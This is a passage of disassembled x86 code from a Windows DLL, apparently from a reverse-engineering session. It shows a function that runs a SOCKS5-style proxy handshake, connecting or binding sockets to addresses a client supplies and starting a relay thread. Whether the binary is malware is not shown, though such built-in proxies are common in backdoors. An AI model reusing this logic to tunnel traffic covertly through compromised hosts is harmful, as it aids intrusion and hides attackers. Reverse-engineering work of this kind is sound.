jnz short loc_10014CFA
jmp loc_10014C1F
; ---------------------------------------------------------------------------
loc_10014CFA: ; CODE XREF: sub_10014B0F+1E4�j
cmp [ebp+var_C39C], 0FFFFFFFFh
jnz short loc_10014D27
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10014D27: ; CODE XREF: sub_10014B0F+1F2�j
push 0 ; lpCompletionRoutine
push 0 ; lpOverlapped
lea edx, [ebp+cbBytesReturned]
push edx ; lpcbBytesReturned
push 0 ; cbOutBuffer
push 0 ; lpvOutBuffer
push 0Ch ; cbInBuffer
push offset dword_10073E28 ; lpvInBuffer
push 98000004h ; dwIoControlCode
mov eax, [ebp+s]
push eax ; s
call ds:WSAIoctl ; WSAIoctl
push 0 ; flags
push 1 ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_10014D90
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10014D90: ; CODE XREF: sub_10014B0F+25B�j
mov [ebp+var_C398], 0
loc_10014D97: ; CODE XREF: sub_10014B0F+307�j
mov [ebp+var_C4D4], 0
jmp short loc_10014DB2
; ---------------------------------------------------------------------------
loc_10014DA3: ; CODE XREF: sub_10014B0F:loc_10014DD7�j
mov edx, [ebp+var_C4D4]
add edx, 1
mov [ebp+var_C4D4], edx
loc_10014DB2: ; CODE XREF: sub_10014B0F+292�j
mov eax, [ebp+var_C4D4]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10014DD9
mov ecx, [ebp+var_C4D4]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10014DD7
jmp short loc_10014DD9
; ---------------------------------------------------------------------------
loc_10014DD7: ; CODE XREF: sub_10014B0F+2C4�j
jmp short loc_10014DA3
; ---------------------------------------------------------------------------
loc_10014DD9: ; CODE XREF: sub_10014B0F+2AF�j
; sub_10014B0F+2C6�j
mov eax, [ebp+var_C4D4]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_10014E12
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10014E12
mov ecx, [ebp+var_C4D4]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_10014E12: ; CODE XREF: sub_10014B0F+2D6�j
; sub_10014B0F+2DF�j
xor ecx, ecx
test ecx, ecx
jnz loc_10014D97
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea ecx, [ebp+var_C398]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10014E83
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10014E83: ; CODE XREF: sub_10014B0F+34C�j
movsx edx, [ebp+var_C398]
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C3A8], eax
mov [ebp+var_C3B0], 0
jmp short loc_10014EB5
; ---------------------------------------------------------------------------
loc_10014EA6: ; CODE XREF: sub_10014B0F:loc_10014FBA�j
mov eax, [ebp+var_C3B0]
add eax, 1
mov [ebp+var_C3B0], eax
loc_10014EB5: ; CODE XREF: sub_10014B0F+395�j
movsx ecx, [ebp+var_C398]
cmp [ebp+var_C3B0], ecx
jge loc_10014FBF
loc_10014EC8: ; CODE XREF: sub_10014B0F+438�j
mov [ebp+var_C4D8], 0
jmp short loc_10014EE3
; ---------------------------------------------------------------------------
loc_10014ED4: ; CODE XREF: sub_10014B0F:loc_10014F08�j
mov edx, [ebp+var_C4D8]
add edx, 1
mov [ebp+var_C4D8], edx
loc_10014EE3: ; CODE XREF: sub_10014B0F+3C3�j
mov eax, [ebp+var_C4D8]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10014F0A
mov ecx, [ebp+var_C4D8]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10014F08
jmp short loc_10014F0A
; ---------------------------------------------------------------------------
loc_10014F08: ; CODE XREF: sub_10014B0F+3F5�j
jmp short loc_10014ED4
; ---------------------------------------------------------------------------
loc_10014F0A: ; CODE XREF: sub_10014B0F+3E0�j
; sub_10014B0F+3F7�j
mov eax, [ebp+var_C4D8]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_10014F43
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10014F43
mov ecx, [ebp+var_C4D8]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
loc_10014F43: ; CODE XREF: sub_10014B0F+407�j
; sub_10014B0F+410�j
xor ecx, ecx
test ecx, ecx
jnz loc_10014EC8
lea edx, [ebp+timeout]
push edx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
mov ecx, [ebp+var_C3A8]
add ecx, [ebp+var_C3B0]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10014FBA
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10014FBA: ; CODE XREF: sub_10014B0F+483�j
jmp loc_10014EA6
; ---------------------------------------------------------------------------
loc_10014FBF: ; CODE XREF: sub_10014B0F+3B3�j
push 2 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C4CC], eax
mov edx, [ebp+var_C4CC]
mov byte ptr [edx], 5
movsx eax, [ebp+buf]
cmp eax, 5
jz short loc_10014FF1
mov ecx, [ebp+var_C4CC]
mov byte ptr [ecx+1], 0FFh
jmp short loc_10014FFB
; ---------------------------------------------------------------------------
loc_10014FF1: ; CODE XREF: sub_10014B0F+4D4�j
mov edx, [ebp+var_C4CC]
mov byte ptr [edx+1], 0
loc_10014FFB: ; CODE XREF: sub_10014B0F+4E0�j
push 0 ; flags
push 2 ; len
mov eax, [ebp+var_C4CC]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015046
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015046: ; CODE XREF: sub_10014B0F+511�j
; sub_10014B0F+5B6�j
mov [ebp+var_C4DC], 0
jmp short loc_10015061
; ---------------------------------------------------------------------------
loc_10015052: ; CODE XREF: sub_10014B0F:loc_10015086�j
mov ecx, [ebp+var_C4DC]
add ecx, 1
mov [ebp+var_C4DC], ecx
loc_10015061: ; CODE XREF: sub_10014B0F+541�j
mov edx, [ebp+var_C4DC]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10015088
mov eax, [ebp+var_C4DC]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10015086
jmp short loc_10015088
; ---------------------------------------------------------------------------
loc_10015086: ; CODE XREF: sub_10014B0F+573�j
jmp short loc_10015052
; ---------------------------------------------------------------------------
loc_10015088: ; CODE XREF: sub_10014B0F+55E�j
; sub_10014B0F+575�j
mov edx, [ebp+var_C4DC]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_100150C1
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100150C1
mov eax, [ebp+var_C4DC]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_100150C1: ; CODE XREF: sub_10014B0F+585�j
; sub_10014B0F+58E�j
xor eax, eax
test eax, eax
jnz loc_10015046
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015130
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015130: ; CODE XREF: sub_10014B0F+5FB�j
; sub_10014B0F+6A0�j
mov [ebp+var_C4E0], 0
jmp short loc_1001514B
; ---------------------------------------------------------------------------
loc_1001513C: ; CODE XREF: sub_10014B0F:loc_10015170�j
mov ecx, [ebp+var_C4E0]
add ecx, 1
mov [ebp+var_C4E0], ecx
loc_1001514B: ; CODE XREF: sub_10014B0F+62B�j
mov edx, [ebp+var_C4E0]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10015172
mov eax, [ebp+var_C4E0]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10015170
jmp short loc_10015172
; ---------------------------------------------------------------------------
loc_10015170: ; CODE XREF: sub_10014B0F+65D�j
jmp short loc_1001513C
; ---------------------------------------------------------------------------
loc_10015172: ; CODE XREF: sub_10014B0F+648�j
; sub_10014B0F+65F�j
mov edx, [ebp+var_C4E0]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_100151AB
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100151AB
mov eax, [ebp+var_C4E0]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_100151AB: ; CODE XREF: sub_10014B0F+66F�j
; sub_10014B0F+678�j
xor eax, eax
test eax, eax
jnz loc_10015130
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+var_C394]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_1001521A
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_1001521A: ; CODE XREF: sub_10014B0F+6E5�j
; sub_10014B0F+78A�j
mov [ebp+var_C4E4], 0
jmp short loc_10015235
; ---------------------------------------------------------------------------
loc_10015226: ; CODE XREF: sub_10014B0F:loc_1001525A�j
mov ecx, [ebp+var_C4E4]
add ecx, 1
mov [ebp+var_C4E4], ecx
loc_10015235: ; CODE XREF: sub_10014B0F+715�j
mov edx, [ebp+var_C4E4]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_1001525C
mov eax, [ebp+var_C4E4]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_1001525A
jmp short loc_1001525C
; ---------------------------------------------------------------------------
loc_1001525A: ; CODE XREF: sub_10014B0F+747�j
jmp short loc_10015226
; ---------------------------------------------------------------------------
loc_1001525C: ; CODE XREF: sub_10014B0F+732�j
; sub_10014B0F+749�j
mov edx, [ebp+var_C4E4]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_10015295
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10015295
mov eax, [ebp+var_C4E4]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_10015295: ; CODE XREF: sub_10014B0F+759�j
; sub_10014B0F+762�j
xor eax, eax
test eax, eax
jnz loc_1001521A
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+var_C390]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015304
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015304: ; CODE XREF: sub_10014B0F+7CF�j
; sub_10014B0F+874�j
mov [ebp+var_C4E8], 0
jmp short loc_1001531F
; ---------------------------------------------------------------------------
loc_10015310: ; CODE XREF: sub_10014B0F:loc_10015344�j
mov ecx, [ebp+var_C4E8]
add ecx, 1
mov [ebp+var_C4E8], ecx
loc_1001531F: ; CODE XREF: sub_10014B0F+7FF�j
mov edx, [ebp+var_C4E8]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10015346
mov eax, [ebp+var_C4E8]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10015344
jmp short loc_10015346
; ---------------------------------------------------------------------------
loc_10015344: ; CODE XREF: sub_10014B0F+831�j
jmp short loc_10015310
; ---------------------------------------------------------------------------
loc_10015346: ; CODE XREF: sub_10014B0F+81C�j
; sub_10014B0F+833�j
mov edx, [ebp+var_C4E8]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_1001537F
cmp [ebp+readfds.fd_count], 40h
jnb short loc_1001537F
mov eax, [ebp+var_C4E8]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_1001537F: ; CODE XREF: sub_10014B0F+843�j
; sub_10014B0F+84C�j
xor eax, eax
test eax, eax
jnz loc_10015304
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea eax, [ebp+var_C3A4]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_100153EE
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_100153EE: ; CODE XREF: sub_10014B0F+8B9�j
mov cl, [ebp+var_C3A4]
mov [ebp+var_C530], cl
cmp [ebp+var_C530], 1
jz short loc_10015411
cmp [ebp+var_C530], 3
jz short loc_10015474
jmp loc_1001567D
; ---------------------------------------------------------------------------
loc_10015411: ; CODE XREF: sub_10014B0F+8F2�j
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C3A0], eax
push 0 ; flags
push 4 ; len
mov edx, [ebp+var_C3A0]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_1001546F
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov edx, dword_10073F78
sub edx, 1
mov dword_10073F78, edx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_1001546F: ; CODE XREF: sub_10014B0F+938�j
jmp loc_1001567D
; ---------------------------------------------------------------------------
loc_10015474: ; CODE XREF: sub_10014B0F+8FB�j
; sub_10014B0F+9E4�j
mov [ebp+var_C4F0], 0
jmp short loc_1001548F
; ---------------------------------------------------------------------------
loc_10015480: ; CODE XREF: sub_10014B0F:loc_100154B4�j
mov eax, [ebp+var_C4F0]
add eax, 1
mov [ebp+var_C4F0], eax
loc_1001548F: ; CODE XREF: sub_10014B0F+96F�j
mov ecx, [ebp+var_C4F0]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_100154B6
mov edx, [ebp+var_C4F0]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_100154B4
jmp short loc_100154B6
; ---------------------------------------------------------------------------
loc_100154B4: ; CODE XREF: sub_10014B0F+9A1�j
jmp short loc_10015480
; ---------------------------------------------------------------------------
loc_100154B6: ; CODE XREF: sub_10014B0F+98C�j
; sub_10014B0F+9A3�j
mov ecx, [ebp+var_C4F0]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_100154EF
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100154EF
mov edx, [ebp+var_C4F0]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_100154EF: ; CODE XREF: sub_10014B0F+9B3�j
; sub_10014B0F+9BC�j
xor edx, edx
test edx, edx
jnz loc_10015474
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 1 ; len
lea edx, [ebp+var_C4EC]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015560
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov edx, dword_10073F78
sub edx, 1
mov dword_10073F78, edx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015560: ; CODE XREF: sub_10014B0F+A29�j
movsx eax, [ebp+var_C4EC]
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_C3A0], eax
loc_1001557A: ; CODE XREF: sub_10014B0F+AEA�j
mov [ebp+var_C4F4], 0
jmp short loc_10015595
; ---------------------------------------------------------------------------
loc_10015586: ; CODE XREF: sub_10014B0F:loc_100155BA�j
mov ecx, [ebp+var_C4F4]
add ecx, 1
mov [ebp+var_C4F4], ecx
loc_10015595: ; CODE XREF: sub_10014B0F+A75�j
mov edx, [ebp+var_C4F4]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_100155BC
mov eax, [ebp+var_C4F4]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_100155BA
jmp short loc_100155BC
; ---------------------------------------------------------------------------
loc_100155BA: ; CODE XREF: sub_10014B0F+AA7�j
jmp short loc_10015586
; ---------------------------------------------------------------------------
loc_100155BC: ; CODE XREF: sub_10014B0F+A92�j
; sub_10014B0F+AA9�j
mov edx, [ebp+var_C4F4]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_100155F5
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100155F5
mov eax, [ebp+var_C4F4]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_100155F5: ; CODE XREF: sub_10014B0F+AB9�j
; sub_10014B0F+AC2�j
xor eax, eax
test eax, eax
jnz loc_1001557A
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
movsx eax, [ebp+var_C4EC]
push eax ; len
mov ecx, [ebp+var_C3A0]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_1001566C
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_1001566C: ; CODE XREF: sub_10014B0F+B35�j
movsx edx, [ebp+var_C4EC]
mov eax, [ebp+var_C3A0]
mov byte ptr [eax+edx], 0
loc_1001567D: ; CODE XREF: sub_10014B0F+8FD�j
; sub_10014B0F:loc_1001546F�j ...
mov [ebp+var_C4F8], 0
jmp short loc_10015698
; ---------------------------------------------------------------------------
loc_10015689: ; CODE XREF: sub_10014B0F:loc_100156BD�j
mov ecx, [ebp+var_C4F8]
add ecx, 1
mov [ebp+var_C4F8], ecx
loc_10015698: ; CODE XREF: sub_10014B0F+B78�j
mov edx, [ebp+var_C4F8]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_100156BF
mov eax, [ebp+var_C4F8]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_100156BD
jmp short loc_100156BF
; ---------------------------------------------------------------------------
loc_100156BD: ; CODE XREF: sub_10014B0F+BAA�j
jmp short loc_10015689
; ---------------------------------------------------------------------------
loc_100156BF: ; CODE XREF: sub_10014B0F+B95�j
; sub_10014B0F+BAC�j
mov edx, [ebp+var_C4F8]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_100156F8
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100156F8
mov eax, [ebp+var_C4F8]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_100156F8: ; CODE XREF: sub_10014B0F+BBC�j
; sub_10014B0F+BC5�j
xor eax, eax
test eax, eax
jnz loc_1001567D
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 2 ; len
lea eax, [ebp+var_C38C]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10015767
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, dword_10073F78
sub eax, 1
mov dword_10073F78, eax
mov eax, 2
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015767: ; CODE XREF: sub_10014B0F+C32�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+var_C3BC], eax
mov cl, [ebp+var_C394]
mov [ebp+var_C534], cl
cmp [ebp+var_C534], 1
jz short loc_100157A0
cmp [ebp+var_C534], 2
jz loc_1001586A
jmp loc_100159FD
; ---------------------------------------------------------------------------
loc_100157A0: ; CODE XREF: sub_10014B0F+C7D�j
mov [ebp+var_C508], 2
mov dx, [ebp+var_C38C]
mov [ebp+var_C506], dx
movsx eax, [ebp+var_C3A4]
cmp eax, 3
jnz short loc_100157FE
mov ecx, [ebp+var_C3A0]
push ecx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C50C], eax
cmp [ebp+var_C50C], 0
jz short loc_100157FC
push 4 ; Size
mov edx, [ebp+var_C50C]
mov eax, [edx+0Ch]
mov ecx, [eax]
push ecx ; Src
lea edx, [ebp+Dst]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
loc_100157FC: ; CODE XREF: sub_10014B0F+CCE�j
jmp short loc_1001580C
; ---------------------------------------------------------------------------
loc_100157FE: ; CODE XREF: sub_10014B0F+CB2�j
mov eax, [ebp+var_C3A0]
mov ecx, [eax]
mov [ebp+Dst], ecx
loc_1001580C: ; CODE XREF: sub_10014B0F:loc_100157FC�j
push 10h ; namelen
lea edx, [ebp+var_C508]
push edx ; name
mov eax, [ebp+var_C3BC]
push eax ; s
call ds:connect ; connect
mov [ebp+len], eax
cmp [ebp+len], 0
jz short loc_1001584F
mov ecx, [ebp+len]
push ecx ; int
mov edx, [ebp+s]
push edx ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_1001584F: ; CODE XREF: sub_10014B0F+D20�j
mov eax, [ebp+var_C3BC]
push eax ; s
mov ecx, [ebp+s]
push ecx ; int
call sub_10014871
add esp, 8
jmp loc_100159FD
; ---------------------------------------------------------------------------
loc_1001586A: ; CODE XREF: sub_10014B0F+C86�j
mov [ebp+var_C51C], 2
mov dx, [ebp+var_C38C]
mov [ebp+var_C51A], dx
movsx eax, [ebp+var_C3A4]
cmp eax, 3
jnz short loc_100158BF
mov ecx, [ebp+var_C3A0]
push ecx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C524], eax
push 4 ; Size
mov edx, [ebp+var_C524]
mov eax, [edx+0Ch]
mov ecx, [eax]
push ecx ; Src
lea edx, [ebp+var_C518]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
jmp short loc_100158CD
; ---------------------------------------------------------------------------
loc_100158BF: ; CODE XREF: sub_10014B0F+D7C�j
mov eax, [ebp+var_C3A0]
mov ecx, [eax]
mov [ebp+var_C518], ecx
loc_100158CD: ; CODE XREF: sub_10014B0F+DAE�j
push 10h
lea edx, [ebp+var_C51C]
push edx
mov eax, [ebp+var_C3BC]
push eax
call dword_10073F84 ; bind
mov [ebp+var_C538], eax
mov ecx, [ebp+var_C538]
mov [ebp+len], ecx
cmp [ebp+len], 0
jz short loc_1001591C
mov edx, [ebp+len]
push edx ; int
mov eax, [ebp+s]
push eax ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_1001591C: ; CODE XREF: sub_10014B0F+DED�j
push 5
mov ecx, [ebp+var_C3BC]
push ecx
call dword_10073F88
mov [ebp+var_C53C], eax
mov edx, [ebp+var_C53C]
mov [ebp+len], edx
cmp [ebp+len], 0
jz short loc_10015964
mov eax, [ebp+len]
push eax ; int
mov ecx, [ebp+s]
push ecx ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_10015964: ; CODE XREF: sub_10014B0F+E35�j
mov edx, [ebp+var_C3BC]
push edx ; s
mov eax, [ebp+s]
push eax ; int
call sub_10014871
add esp, 8
mov [ebp+var_C520], 10h
lea ecx, [ebp+var_C520]
push ecx
lea edx, [ebp+var_C51C]
push edx
mov eax, [ebp+var_C3BC]
push eax
call dword_10073F80 ; accept
mov [ebp+var_C540], eax
mov ecx, [ebp+var_C540]
mov [ebp+var_C3BC], ecx
cmp [ebp+var_C3BC], 0FFFFFFFFh
jnz short loc_100159E7
mov edx, [ebp+len]
push edx ; int
mov eax, [ebp+s]
push eax ; s
call sub_10014769
add esp, 8
mov ecx, dword_10073F78
sub ecx, 1
mov dword_10073F78, ecx
or eax, 0FFFFFFFFh
jmp loc_10015BDE
; ---------------------------------------------------------------------------
loc_100159E7: ; CODE XREF: sub_10014B0F+EA9�j
mov edx, [ebp+var_C3BC]
push edx ; s
mov eax, [ebp+s]
push eax ; int
call sub_10014871
add esp, 8
loc_100159FD: ; CODE XREF: sub_10014B0F+C8C�j
; sub_10014B0F+D56�j
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov ecx, [ebp+lpParameter]
mov edx, [ebp+var_C3BC]
mov [ecx+4], edx
mov eax, [ebp+lpParameter]
mov ecx, [ebp+s]
mov [eax], ecx
lea edx, [ebp+ThreadId]
push edx ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+lpParameter]
push eax ; lpParameter
push offset sub_10014916 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov [ebp+var_14], eax
loc_10015A41: ; CODE XREF: sub_10014B0F:loc_10015B98�j
mov ecx, 1
test ecx, ecx
jz loc_10015B9D
loc_10015A4E: ; CODE XREF: sub_10014B0F+FBE�j
mov [ebp+var_C528], 0
jmp short loc_10015A69
; ---------------------------------------------------------------------------
loc_10015A5A: ; CODE XREF: sub_10014B0F:loc_10015A8E�j
mov edx, [ebp+var_C528]
add edx, 1
mov [ebp+var_C528], edx
loc_10015A69: ; CODE XREF: sub_10014B0F+F49�j
mov eax, [ebp+var_C528]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_10015A90
mov ecx, [ebp+var_C528]
mov edx, [ebp+ecx*4+readfds.fd_array]
cmp edx, [ebp+s]
jnz short loc_10015A8E
jmp short loc_10015A90
; ---------------------------------------------------------------------------
loc_10015A8E: ; CODE XREF: sub_10014B0F+F7B�j
jmp short loc_10015A5A
; ---------------------------------------------------------------------------
loc_10015A90: ; CODE XREF: sub_10014B0F+F66�j
; sub_10014B0F+F7D�j
mov eax, [ebp+var_C528]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_10015AC9
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10015AC9
mov ecx, [ebp+var_C528]
mov edx, [ebp+s]
mov [ebp+ecx*4+readfds.fd_array], edx
mov eax, [ebp+readfds.fd_count]
add eax, 1
mov [ebp+readfds.fd_count], eax
